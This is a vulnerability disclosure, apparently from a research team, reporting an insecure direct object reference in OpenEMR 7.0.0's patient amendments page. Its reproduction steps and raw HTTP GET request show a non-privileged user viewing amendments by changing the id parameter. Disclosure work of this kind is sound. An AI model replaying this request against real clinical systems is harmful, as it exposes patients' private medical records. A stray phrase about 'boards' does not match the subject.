Non-Privilege user can view Patient's Amendments in openemr/openemr
Jul 21st 2022
We would like to report the vulnerability we found during software testing. The OpenEMR 7.0.0 (latest version) Open-Source electronic health records and medical practice management application has Insecure direct object reference (IDOR) to function “Patient’s Amendments”, and it never been reported before (We've checked from CVE Official website).
Insecure Direct Object Reference
Vulnerable Source Code
/var/www/localhost/htdocs/interface/patient_file/summary/add_edit_amendments.php (Please see more details in the occurrences section)
Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. A perpetrator, who is an authorized system user (Non-privilege users (accounting, front office)), simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for. As a result, an Insecure Direct Object References (IDOR) vulnerability allowing remote attackers to view the metadata of boards they should not have access.
It is recommended to implement access control check to ensure the user is authorized for the requested object on the GET method.
- Ammarit Thongthua, Rattapon Jitprajong and Nattakit Intarasorn from Secure D Center Research Team
Example PoC Screenshots
OpenEMR Version 7.0.0
Login with Administrator privilege and add Amendments
Successfully add Amendments via normal step
Login with non-Privilege user
Direct access to URL and success to view “Amendments Page”
Insecure direct object reference (IDOR)
GET /interface/patient_file/summary/add_edit_amendments.php?id=1 HTTP/1.1 Host: localhost Cookie: OpenEMR=Xojlqu%2CirL3ibLmkKZOwVyA8rILh1jmpvFR7XDVAPti0jEHh Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
According to openEMR version 7.0.0. It is, therefore, affected by an Insecure Direct Object References (IDOR) vulnerability allowing remote attackers to view the metadata of boards they should not have access on Patient's Medical record Amendments.